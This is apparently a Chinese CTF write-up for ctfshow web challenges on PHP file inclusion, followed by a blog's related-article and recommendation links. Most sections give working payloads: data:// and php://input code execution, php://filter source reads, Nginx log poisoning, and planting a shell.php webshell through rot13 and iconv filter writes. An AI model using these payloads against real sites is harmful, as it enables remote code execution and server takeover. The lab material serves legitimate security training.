文件包含与伪协议

一、无任何过滤措施的文件包含漏洞：(ctfshow-web78)：

1、data://协议：

?file=data://text/plain,<?php system('tac flag.php');?>

2、php://filter协议：

?file=php://filter/read=convert.base64-encode/resource=flag.php

得到 base64加密过后的数据，对数据进行base64解密即可得到flag

3、php://input协议：

?file=php://input

然后使用POST方法发送php代码：<?php system('tac flag.php');?>

4、file直接包含：

file的使用存在前提：

allow_url_fopen = On

allow_url_include = On

使用file协议需预知flag文件路径：

?file=/var/www/html/flag.php

二、过滤 'php'：(ctfshow-web79)：

1、data://协议 + PHP短标签：

?file=data://text/plain,<?='tac flag.php'?>

tac flag.php应用反引号扩起

<?=为PHP短标签，作用等效于 <?php echo

2、data://协议 + base64编码：

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs/Pg==

3、php://input协议大小写绕过：

三、Nginx日志写入(ctfshow-web81)：

Nginx的日志文件 access.log 默认配置路径为 /var/log/nginx/access.log

：被过滤，伪协议失效，通过Wappalyzer得知Web服务器为Nginx，且代码未作对于Nginx默认日志访问路径参数的相关过滤，考虑使用 Nginx日志写入一句话木马。

四、file_put_contents() 函数(ctfshow-web87)：

.被过滤，无法实现access.log的日志写入，但是可以根据fil_put_contents()函数的函数特性，构造新文件shell.php，在shell.php中写入一句话木马拿权限。

?file=php://filter/write=string.rot13/resource=shell.php

由于urldeocde()函数，需要对?file=的参数进行url双编码(浏览器解码一次，urldecode()函数解码一次)

content参数使用POST方法请求：

content=?<hp pe@av(l_$EG[T]1;)>? （rot13编码）

如下图所示：

最后访问/shell.php连接一句话木马：

/shell.php?1=system('ls');

/shell.php?1=system('tac fl0g.php');

五、iconv过滤器(stfshow-web117)：

代码中过滤了绝大多数 php://filter 过滤器，但是未过滤 iconv过滤器：

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=shell.php

contents参数为指定字符编码：

文件包含与PHP伪协议的更多相关文章

PHP文件包含及使用伪协议getshell
file:// - 访问本地文件系统 http:// - 访问 HTTP(s) 网址 ftp:// - 访问 FTP(s) URLs php:// - 访问各个输入/输出流(I/O streams) ...
php 文件包含base64读取文件 preg_replace函数
解题部分题目来源攻防世界web高手进阶区1.拿到题目以后,发现是一个index.php的页面,并且设备-没有显示完全,此位置可疑.2.源代码中发现?page=index,出现page这个get参数,联 ...
PHP文件包含学习笔记
看完下面的几篇文章,然后从第8行开始以后的内容可以忽略!此文是个笔记梳理,是对大佬文章简单的COPY记录,方便以后查看,自己只复现了其中的例子参考文章: PHP文件包含漏洞利用思路与Bypass总结 ...
web文件包含
web安全~文件包含总结文章来自freebuf,作者总结的很好,所以拿来做笔记用!!! 0×01 文件包含简介服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当P ...
web安全~文件包含总结
文章来自freebuf,作者总结的很好,所以拿来做笔记用!!! 0×01 文件包含简介服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大 ...
✔PHP文件包含漏洞全面总结
我的另一篇博客总结的不够全面,但依然有借鉴价值:https://www.cnblogs.com/Zeker62/p/15192610.html 目录文件包含的定义文件包含漏洞常见函数文件包含漏洞 ...
文件包含漏洞（DVWA环境中复现）
LOW: 源代码: <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 可以看到,low级别的代码对包含的文件 ...
DVWA之File Inclusion(文件包含)
目录 LOW: Medium: High Impossible LOW: 源代码: <?php // The page we wish to display $file = $_GET[ 'pa ...
CTF 文件包含与伪协议
正巧在写代码审计的文章,无意间看到了一篇CTF的代码审计,CTF题目很好,用的姿势正如标题,文件包含和伪协议. 先放出原文链接(http://www.freebuf.com/column/150028 ...
风炫安全web安全学习第三十三节课文件包含漏洞基础以及利用伪协议进行攻击
风炫安全web安全学习第三十三节课文件包含漏洞基础以及利用伪协议进行攻击文件包含漏洞参考文章:https://chybeta.github.io/2017/10/08/php文件包含漏洞/ 分类 ...

随机推荐

AT_abc178_d 题解
洛谷链接&Atcoder 链接本篇题解为此题较简单做法及较少码量,并且码风优良,请放心阅读. 题目简述给定一个正整数 $S$,问有多少个数满足以下条件: 序列中必须为 \(\ge 3\ ...
vs2019如何自动生成有下划线前缀的字段名？
vs2019代码自动完成功能非常强大,今天要说的是根据构造函数的参数自动生成字段的事儿. 下图所示,IDE可以根据构造函数的参数自动生成私有字段这个功能非常好,代码编写效率大大提升,生成的代码如下: ...
学习笔记--Java 控制语句
Java 控制语句 Java 控制语句选择结构 if 语句 switch 语句循环结构 for循环 while循环 do...while循环循环控制 break 语句 continue 语句选 ...
JavaScript高级~数组方法reduce
reduce() 方法对数组中的每个元素执行一个由您提供的reducer函数(升序执行),将其结果汇总为单个返回值. 有点抽象,意思可以看做每个元素执行之后,都会有一个汇总结果,你可以通过这个汇总结果 ...
【译】宣布三项新的高级 Visual Studio 订阅者福利
Visual Studio 订阅(无论是专业版还是企业版)提供的不仅仅是软件使用权:这是一个全面的工具包,旨在显著提高您的开发能力和职业发展.这些订阅每年可以为您节省数千美元,提供各种服务,从每月用于 ...
【Vue】图片裁剪功能支持
一.效果展示: 1.表单的图片上传项: - 新增时默认一个空白Input框 - 更新时展示以往上传存放的图片, - 点击[查看]浏览完整大小 - 点击[删除]清空src地址,重新上传新照片 2.裁剪框 ...
智能工业化的关键一环：sim2real的仿真环境设计
智能工业化,不论是智能机器人技术还是数字孪生技术,都不可避免的要使用的一个技术就是仿真环境技术. 在智能工业化还停留在学术阶段的时候,大家都可以使用一些开源的免费的仿真环境做research,但是到了 ...
gym.ObservationWrapper使用时的注意点——reset和step函数可以覆盖observation函数
记录一个刚学习到的gym使用的点,就是gym.ObservationWrapper使用时的注意点--reset和step函数可以覆盖observation函数. 给出代码: import gym cl ...
ubuntu 安装osx 主题转自linux公社
繁體你好,游客登录注册搜索首页Linux新闻Linux教程数据库技术Linux编程服务器应用Linux安全Linux下载Linux认证Linux主题Linux壁纸Linux软件数码手机电脑 ...

文件包含与PHP伪协议